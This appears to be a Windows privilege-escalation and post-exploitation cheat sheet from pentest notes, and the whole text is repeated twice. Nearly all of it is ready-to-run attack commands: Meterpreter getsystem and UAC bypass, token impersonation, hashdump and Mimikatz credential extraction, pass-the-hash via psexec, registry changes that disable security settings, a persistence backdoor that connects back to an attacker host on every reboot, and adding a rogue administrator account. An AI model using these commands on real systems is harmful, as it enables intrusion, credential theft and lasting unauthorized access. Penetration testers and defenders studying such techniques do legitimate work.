Table of Content

Table of Content
Windows
With a Meterpreter Shell
Incognito (lateral Windows privesc)
Unquoted Service Paths
Dumping hashes
Pass the Hash
Mimikatz
Enable RDP
Connect-back Backdoors
Without a Meterpreter Shell
List running processes
Unquoted Service Paths
DLL search order
Connect to RDP using a NTLM Hash
Create a new user
Linux

Windows

With a Meterpreter Shell

getsystem

Automatically try to privesc

run post/windows/gather/win_privs

Enumerate privileges and system infos

bypassuac

Bypass UAC (Might work better to run this before getsystem)

Incognito (lateral Windows privesc)

Incognito is an extension built for lateral Windows privesc

use incognito

Load the Incognito extension

list_tokens -u

List available users to impersonate

impersonate_token $USER

Impersonate a user

Unquoted Service Paths

See Privilege Escalation - Unquoted Service Paths

use exploit/windows/local/trusted_service_path

Automatically exploit unquoted service paths

show options

run

Dumping hashes

hashdump

Dump the password hashes

If the command fails, migrate to another process, then rerun the command.

Pass the Hash

This will only work if we use an administrator account

use exploit/windows/smb/psexec

Performs a pass the hash attack on the machine itself using either a password or a hash

show options

run

If the command fails with Exploit failed [no-access], in powershell, run

Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord

Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name RequireSecuritySignature -Value 0 -Type DWord

and rerun the exploit.

Mimikatz

Note that Mimikatz works without errors when the meterpreter shell is attached to a 64-bit process.

ps -A x86_64 -s

List 64-bit processes

migrate $PID

Migrate to a process ID

load mimikatz

Load the mimikatz extension

wdigest

Try to extract credentials

Enable RDP

run getgui -e

Enable RDP

If the user is not allowed to connect via RDP, run (in a windows shell)

net localgroup "Remote Desktop Users" $USER /add

Add a user to the Remote Desktop Users group

rdesktop $IP -u $USER -p $PASSWORD

Connect to the machine via RDP

Connect-back Backdoors

This will generate a connect back backdoor (reverse shell but the other way around) that will try to connect to our machine at every reboot.

persistence -A -X -i 5 -p 8080 -r $OUR_IP

Start a connect back backdoor, start a handler on our machine, start the agent on boot, try to reconnect every 5s, connect to our machine on port 8080

To get back the reverse shell, simply start a handler on port 8080

run exploit/multi/handler

Without a Meterpreter Shell

List running processes

net start

List started services

Unquoted Service Paths

This vulnerability happens when a service is configured with a path to a binary which is unquoted and contains spaces.

In that case, Windows looks for the binary in this order:

C:\Program.exe
C:\Program Files (x86)\Author\Program.exe
C:\Program Files (x86)\Author\Program\SETEVENT.exe

That way, we can write a reverse shell and name it as C:\Program.exe or as C:\Program Files (x86)\Author\Program.exe. This executable would be launched when the service starts, rather than the original executable.

wmic services get name,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows//" |findstr /i /v """

List all unquoted service paths

DLL search order

When a program is launched, the DLL search order is, generally:

The directory of the executable
C:\Windows\System32
C:\windows\system
C:\windows
The current directory when the executable was launched
All directories in the PATH environment variable

Connect to RDP using a NTLM Hash

xfreerdp /u:$USER /d:$DOMAIN /pth:$HASH /v:$IP

Create a new user

net user $USER $PASSWORD /add

Create a new user

net localgroup "Administrators" $USER /add

Add the user to the Administrators group

Linux

Table of Content

Table of Content
Windows
With a Meterpreter Shell
Incognito (lateral Windows privesc)
Unquoted Service Paths
Dumping hashes
Pass the Hash
Mimikatz
Enable RDP
Connect-back Backdoors
Without a Meterpreter Shell
List running processes
Unquoted Service Paths
DLL search order
Connect to RDP using a NTLM Hash
Create a new user
Linux

Windows

With a Meterpreter Shell

getsystem

Automatically try to privesc

run post/windows/gather/win_privs

Enumerate privileges and system infos

bypassuac

Bypass UAC (Might work better to run this before getsystem)

Incognito (lateral Windows privesc)

Incognito is an extension built for lateral Windows privesc

use incognito

Load the Incognito extension

list_tokens -u

List available users to impersonate

impersonate_token $USER

Impersonate a user

Unquoted Service Paths

See Privilege Escalation - Unquoted Service Paths

use exploit/windows/local/trusted_service_path

Automatically exploit unquoted service paths

show options

run

Dumping hashes

hashdump

Dump the password hashes

If the command fails, migrate to another process, then rerun the command.

Pass the Hash

This will only work if we use an administrator account

use exploit/windows/smb/psexec

Performs a pass the hash attack on the machine itself using either a password or a hash

show options

run

If the command fails with Exploit failed [no-access], in powershell, run

Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord

Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name RequireSecuritySignature -Value 0 -Type DWord

and rerun the exploit.

Mimikatz

Note that Mimikatz works without errors when the meterpreter shell is attached to a 64-bit process.

ps -A x86_64 -s

List 64-bit processes

migrate $PID

Migrate to a process ID

load mimikatz

Load the mimikatz extension

wdigest

Try to extract credentials

Enable RDP

run getgui -e

Enable RDP

If the user is not allowed to connect via RDP, run (in a windows shell)

net localgroup "Remote Desktop Users" $USER /add

Add a user to the Remote Desktop Users group

rdesktop $IP -u $USER -p $PASSWORD

Connect to the machine via RDP

Connect-back Backdoors

This will generate a connect back backdoor (reverse shell but the other way around) that will try to connect to our machine at every reboot.

persistence -A -X -i 5 -p 8080 -r $OUR_IP

Start a connect back backdoor, start a handler on our machine, start the agent on boot, try to reconnect every 5s, connect to our machine on port 8080

To get back the reverse shell, simply start a handler on port 8080

run exploit/multi/handler

Without a Meterpreter Shell

List running processes

net start

List started services

Unquoted Service Paths

This vulnerability happens when a service is configured with a path to a binary which is unquoted and contains spaces.

In that case, Windows looks for the binary in this order:

C:\Program.exe
C:\Program Files (x86)\Author\Program.exe
C:\Program Files (x86)\Author\Program\SETEVENT.exe

wmic services get name,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows//" |findstr /i /v """

List all unquoted service paths

DLL search order

When a program is launched, the DLL search order is, generally:

The directory of the executable
C:\Windows\System32
C:\windows\system
C:\windows
The current directory when the executable was launched
All directories in the PATH environment variable

Connect to RDP using a NTLM Hash

xfreerdp /u:$USER /d:$DOMAIN /pth:$HASH /v:$IP

Create a new user

net user $USER $PASSWORD /add

Create a new user

net localgroup "Administrators" $USER /add

Add the user to the Administrators group